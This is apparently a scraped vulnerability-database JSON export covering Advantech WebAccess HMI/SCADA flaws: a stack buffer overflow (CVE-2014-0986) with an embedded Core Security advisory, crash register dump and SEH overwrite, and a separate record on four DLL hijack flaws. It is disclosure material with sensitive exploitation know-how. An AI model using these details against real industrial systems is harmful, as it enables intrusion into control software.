"JVNDB", "id": "JVNDB-2014-004352" }, { "db": "CNNVD", "id": "CNNVD-201409-733" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004352" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69531" } ], "trust": 0.3 }, "cve": "CVE-2014-0986", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0986", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05421", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d29073fe-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68479", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0986", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0986", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05421", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-733", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68479", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "VULHUB", "id": "VHN-68479" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "CNNVD", "id": "CNNVD-201409-733" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the GotoCmd parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0986" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "BID", "id": "69531" }, { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68479" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0986", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.4 }, { "db": "BID", "id": "69531", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-733", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05421", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004352", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D29073FE-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68479", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "VULHUB", "id": "VHN-68479" }, { "db": "BID", "id": "69531" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-733" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "id": "VAR-201409-0440", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "VULHUB", "id": "VHN-68479" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" } ] }, "last_update_date": "2024-11-23T22:38:56.211000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05421)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53291" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "CNNVD", "id": "CNNVD-201409-733" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68479" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69531" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0986" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0986" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.4, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "VULHUB", "id": "VHN-68479" }, { "db": "BID", "id": "69531" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-733" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": "VULHUB", "id": "VHN-68479" }, { "db": "BID", "id": "69531" }, { "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-733" }, { "db": "NVD", "id": "CVE-2014-0986" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05421" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68479" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69531" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-733" }, { "date": "2014-09-20T10:55:03.997000", "db": "NVD", "id": "CVE-2014-0986" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05421" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68479" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69531" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004352" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-733" }, { "date": "2024-11-21T02:03:09.863000", "db": "NVD", "id": "CVE-2014-0986" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-733" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004352" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-733" } ], "trust": 0.8 } }
var-201610-0691
Vulnerability from variot
WebAccess can establish an information management platform for users, and simultaneously improve the efficiency of vertical market management development.
HMI / SCADA software webaccess has 4 dll hijack vulnerabilities. When bwopctool.dll, bwabout.dll, BwPAlarm.dll, Webvsid.dll are automatically loaded, Webvrpcs.exe will not verify these dlls, and attackers can place malicious dll files In the directory of the process, the system is attacked. You can download it from http://www.advantech.com.cn/industrial-automation/webaccess/download. This page downloads three versions of webaccess. Any version of webaccess is affected. After installing webaccess, run the batch provided by the word document directly. After processing the file, you can see the effect of dll hijack, and a calculator will pop up after success
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201610-0691", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "7.2*" }, { "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "8.0*" } ], "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 3.3, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "id": "CNVD-2016-10337", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.6, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 3.3, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.2, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "CNVD", "id": "CNVD-2016-10337", "trust": 0.6, "value": "LOW" }, { "author": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c", "trust": 0.2, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess can establish an information management platform for users, and simultaneously improve the efficiency of vertical market management development. \n\nHMI / SCADA software webaccess has 4 dll hijack vulnerabilities. When bwopctool.dll, bwabout.dll, BwPAlarm.dll, Webvsid.dll are automatically loaded, Webvrpcs.exe will not verify these dlls, and attackers can place malicious dll files In the directory of the process, the system is attacked. You can download it from http://www.advantech.com.cn/industrial-automation/webaccess/download. This page downloads three versions of webaccess. Any version of webaccess is affected. After installing webaccess, run the batch provided by the word document directly. After processing the file, you can see the effect of dll hijack, and a calculator will pop up after success", "sources": [ { "db": "CNVD", "id": "CNVD-2016-10337" }, { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" } ], "trust": 0.72 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-10337", "trust": 0.8 }, { "db": "IVD", "id": "FF7DAE53-C23C-40B0-9F59-13A4DB97F36C", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "id": "VAR-201610-0691", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "last_update_date": "2022-05-17T02:07:06.759000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HMI / SCADA software webaccess7.2 / 8.0 / 8.1 4 dll hijack vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/82819" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-10-31T00:00:00", "db": "IVD", "id": "ff7dae53-c23c-40b0-9f59-13a4db97f36c" }, { "date": "2016-12-03T00:00:00", "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-11-24T00:00:00", "db": "CNVD", "id": "CNVD-2016-10337" } ] }, "title": { 